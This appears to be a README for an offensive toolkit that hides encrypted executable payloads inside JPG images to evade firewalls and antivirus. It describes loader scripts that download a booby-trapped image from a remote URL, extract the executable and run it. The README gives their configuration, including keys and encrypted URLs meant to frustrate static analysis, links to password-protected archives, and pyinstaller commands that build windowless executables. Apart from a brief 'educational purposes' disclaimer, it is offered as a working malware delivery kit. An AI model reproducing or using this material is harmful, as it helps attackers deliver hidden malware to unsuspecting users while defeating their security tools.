It embeds the executable file or payload inside the jpg file. The method the program uses isn't exactly called one of the steganography methods [secure cover selection, least significant bit, palette-based technique, etc ]. For this reason, it does not cause any distortion in the JPG file. The JPG file size and payload do not have to be proportional.The JPG file is displayed normally in any viewing application or web application. It can bypass various security programs such as firewall, antivirus. If the file is examined in detail, it is easier to detect than steganography methods.However, since the payload in the JPG file is encrypted, it cannot be easily decrypted. It also uses the "garbage code insertion/dead-code insertion" method to prevent the payload from being caught by the antivirus at runtime.
File(s)
1) InjectingMalwareIntoJPG.py : It is the script that embeds the payload into the JPG file.
2) malware_v1.py : It is the script that extracts the malware in the existing image file and runs it. The malware loaded JPG file must be in the same folder. (Default JPG Name : "malwareJPG.jpg")
3) malware_v2.py : It is the script that extracts the malware in the JPG file downloaded from the internet and runs it. (Default Url : "https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg") (After the script code is compiled, the values of the variables can be seen with the static analysis of the program.)
4) malware_v3.py : It is the script that extracts the malware in the JPG file downloaded from the internet and runs it. (Default Url : "https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg") (After the script code is compiled, the values of the variables can be seen with dynamic analysis of the program.)
- "Injecting Malware Into JPG File"
- InjectingMalwareIntoJPG.rar --> zip password: "gungorX"
- Link = https://drive.google.com/file/d/1ENt-d0q-Yv-4mZALiUwqvZtp23JH415s/view?usp=sharing
- "Malware V1" [Updated on 17/06/2022]
- malware_v1.rar --> zip password: "gungorX"
- Link = https://drive.google.com/file/d/1EyEURlNeSDOxUUdVcrfq_J7InFiJxfG4/view?usp=sharing
- "Malware V2"
- malware_v2.rar --> zip password: "gungorX"
- Link = https://drive.google.com/file/d/1yxvb3BjH3Xi3vbE7VTyBDeWGhr8v3cSX/view?usp=sharing
- "Malware V3"
- malware_v3.rar --> zip password: "gungorX"
- Link = https://drive.google.com/file/d/1f_JQSrKTknlTg31rDeKOF3NpAVN9NO3C/view?usp=sharing
Required libraries: colorama, cryptography, requests, pyinstaller
pip install colorama
pip install cryptography
pip install requests
pip install pyinstaller
"pyinstaller" will be used to make the code one piece executable
InjectingMalwareIntoJPG.py (Default Settings)
class SETTINGS():
PROGRAM_NAME = "Injecting Malware Into JPG" # Program Name
JPG_FILE = 'linux.jpg' # Jpg file name # The variable is changed again during the program run.
EXE_FILE = "malware.exe" # Malware file name # The variable is changed again during the program run.
OUT_FILE = "malwareJPG.jpg" # Out file name
PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{' # Encryption key
PRIVATE_NUMBER = 19 # Encryption number
BUFFER = 1024 # Buffer for memory optimization
FILL_SIZE = 1073741824 # 1024x1024x1024 (1 GB) # The size to increase the size of the executable file.
WAIT_TIME = 0.1 # Waiting time between processes
malware_v1.py (Default Settings)
class SETTINGS():
JPG_NAME = 'malwareJPG.jpg' # Jpg file name
OUT_FILE = "malware_test.exe" # (to be created) Malware file name
PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{' # Encryption key
PRIVATE_NUMBER = 19 # Encryption number
BUFFER = 1024 # Buffer for memory optimization
WAIT_TIME = 0.1 # Waiting time between processes
malware_v2.py (Default Settings)
class SETTINGS():
URL_ADDR = "https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg" # url where the image is located
OUT_FILE = "malware_test.exe" # (to be created) Malware file name
PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{' # Encryption key
PRIVATE_NUMBER = 19 # Encryption number
JPG_NAME = 'malware_attack.jpg' # Jpg file name
BUFFER = 1024 # Buffer for memory optimization
WAIT_TIME = 0.1 # Waiting time between processes
malware_v3.py (Default Settings)
# Encrypted data for static analysis
# However, variables can be resolved with dynamic analysis.
class SETTINGS():
KEY = b'w3F4q2qyPG6WGHMwG6TrYq2R_ih9-_XTYH0H89J7UMk='
URL_ADDR = b'gAAAAABiinQIPIhKqfLYaKt76lRXeboIJfCDr0NGsGROzSLe3ndeSo9RxM-EXNzsxFjwC-sU3axowzYaZCgsSfMl4qe4rWGaLbmNY0zD6_S34lOO10a_idkEQpfVSld0BSM7Yd4LXpgH6Fvkuw36QVlzmI_NvQJ6v5_mgEmCIzhSbiuMHJ-p9hdj28-2cMRa1BcFWZBbbRe7'
OUT_FILE = b'gAAAAABiinRLcZh6qJ959Mzqup5ZLOnGwAQBAFPXD6hebpSpI4u3M24Npi3lIbTjW5ImEYwiz6WfD8JOyrcDzjR5gpTun4pI0gPHjf-xi_LSboOy5B7hwXo='
PUPLIC_KEY = b'rt!1AtbydmUklvkaapdli+R)%=+4359?6#0!8-][gGu1nFGqoQrP[-{!Ue&&QcVb09@'
PRIVATE_NUMBER = 4
JPG_NAME = b'gAAAAABiinSMlx2n6LSUzHfrET4UDnv_Fy7lc7h9zAKsC6p9ulM56yW0nXarAWvU2nmZqdNscglA9MLr2P3p20ADC3CWZsul4-YnfDiIFl13tZUnZ_BdDRU='
BUFFER = 1024
WAIT_TIME = 0.1
[Language : Python 3.8.5]
# [Program that produces jpg with malware]
pyinstaller --onefile --icon=InjectingMalwareIntoJPG.ico InjectingMalwareIntoJPG.py
# [Malware(s)]
pyinstaller --onefile --noconsole --icon=malware.ico malware_v1.py
pyinstaller --onefile --noconsole --icon=malware.ico malware_v2.py
pyinstaller --onefile --noconsole --icon=malware.ico malware_v3.py
Screenshot [1] (InjectingMalwareIntoJPG.exe)
Screenshot [2] (InjectingMalwareIntoJPG.exe)
Screenshot [3] (malware_v1.exe)
Screenshot [4] (malware_v1.exe)
Screenshot [5] (malware_v2.exe)
Screenshot [6] (malware_v3.exe)
Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.